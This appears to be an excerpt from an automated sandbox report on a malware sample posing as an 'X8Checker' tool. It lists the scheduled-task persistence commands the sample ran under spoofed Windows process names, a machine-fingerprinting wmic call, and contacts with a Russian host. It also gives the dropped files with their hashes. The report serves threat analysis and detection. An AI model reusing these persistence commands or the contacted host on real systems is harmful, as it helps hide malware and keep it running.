schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\odt\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\odt\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\odt\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Reviewwinbrokernet\services.exe

"C:\Reviewwinbrokernet\services.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 a0996805.xsph.ru udp
RU 141.8.192.103:80 a0996805.xsph.ru tcp
US 8.8.8.8:53 103.192.8.141.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp

Files

memory/1820-1-0x0000000000400000-0x0000000000562000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\X8Checker 2.6.exe

MD5 26abb9e459e5976f658ce80d6433f1b1
SHA1 3c8f02c1cf7b8ae82be3deea4b360497f6fee1c3
SHA256 60cc77b5d4210cef0a9032908b179142f212155426fdae48055c5f72811f7a12
SHA512 c2c02aa1db8036c7309100bb683ec7708fedfb129d763d86e03d9d6adc3688423ec04cb5b596eaf99300787f90d641e53350e1ceed0e8b11d6f29333e04b4ce8

memory/884-17-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Umbral.exe

MD5 ec2aed743841885a579338921df5073b
SHA1 8167b69da03e79cc4d013f2b1e2c972a9fa15296
SHA256 f3742ed689ca175bd615de562301102cd1bb72f65b3af8660883d5ea31bada2b
SHA512 aa4430171bd657439957cd5f3da3babf43725fce801c46377d003cd2f019bbb145eaef5de84e87f8bbf81a679733923ae3c5ff54f55e31cb575e13a4073ccc7c

memory/3712-26-0x00007FFD77153000-0x00007FFD77155000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8XChecker.exe

MD5 562a032b64898a5f86890120f1a6872b
SHA1 2a96ddcf1fc64ec4ab23597cbfce61bed40dd27a
SHA256 bb99ec3195fb0a972271667234885e97ff017df9cc64e605f2d5aafb469bd2a3
SHA512 871fe5fa1da1df87e909e1f9b1276e9d6a1dcaa0e5da7ed5d2df338f12c1b3ac02442ebd65138cbf7a0eb4b6e9237e806fe844f6dd15e352669fdc50cfa8960b

memory/3712-27-0x000002B462D20000-0x000002B462D60000-memory.dmp

memory/1820-30-0x0000000000400000-0x0000000000562000-memory.dmp

memory/3712-32-0x00007FFD77150000-0x00007FFD77C11000-memory.dmp

memory/3712-40-0x00007FFD77153000-0x00007FFD77155000-memory.dmp

C:\Reviewwinbrokernet\86Wn4vQvMoqlspy5.vbe

MD5 d0546d4e82d204a215d2202b8122bebf
SHA1 b4b1c33b5104d1d003670c341908a01cc0a4a09b
SHA256 6f1ff6622e86a07eeb4c514424e78f7a9272ba7922de6dcf1df7810f40ab6756
SHA512 91d46ca23a26764f516ae273ae54cf689f303e772e954696e7e0ee7794b9b664be0aa2f432f34822b23657fb2c8bc489650f5b4d36e9b8de3d96a6ab864b9925

memory/3712-42-0x00007FFD77150000-0x00007FFD77C11000-memory.dmp

C:\Reviewwinbrokernet\NckHnt5ezZ5X7x5KKKZDHVFQBsAwD.bat

MD5 5ca65390126e266243ff3881f9cfb3f2
SHA1 228f50250b0cff6894fcc595c1dc1cbcdfd1b4b6
SHA256 ce08fb9623e455e0fd404378ec059c61cbf2c9de162f49c6cf59d244e0cdca54
SHA512 4f211680121ea9ce99c9dfa78de84b2d149902a94eda40d88e7e3cc0c2ba1910be157a84cadc4cc6bf36fbcc20f050f0766a30e9bc1481c93a2c45e6b7b7c47b

C:\Reviewwinbrokernet\bridgefont.exe

MD5 b5c2e9124dfa9d37f7b2032b94127a37
SHA1 3f162c1dff58ff017d4a95540a220b7355765eb6
SHA256 15f729a2209101f7c6ecdaea74121dff0aec9fc1cb6bf3c6a30094af95bc5876
SHA512 edfbf86105464cc2cd214ec7da355f120d1913179855270d0a286bab67bc6c354151dc209a1f1e25ad777b523250ed2f1307e4c5e61434038a488f875c921b46

memory/4596-47-0x0000000000720000-0x00000000007F6000-memory.dmp

memory/3712-81-0x00007FFD77150000-0x00007FFD77C11000-memory.dmp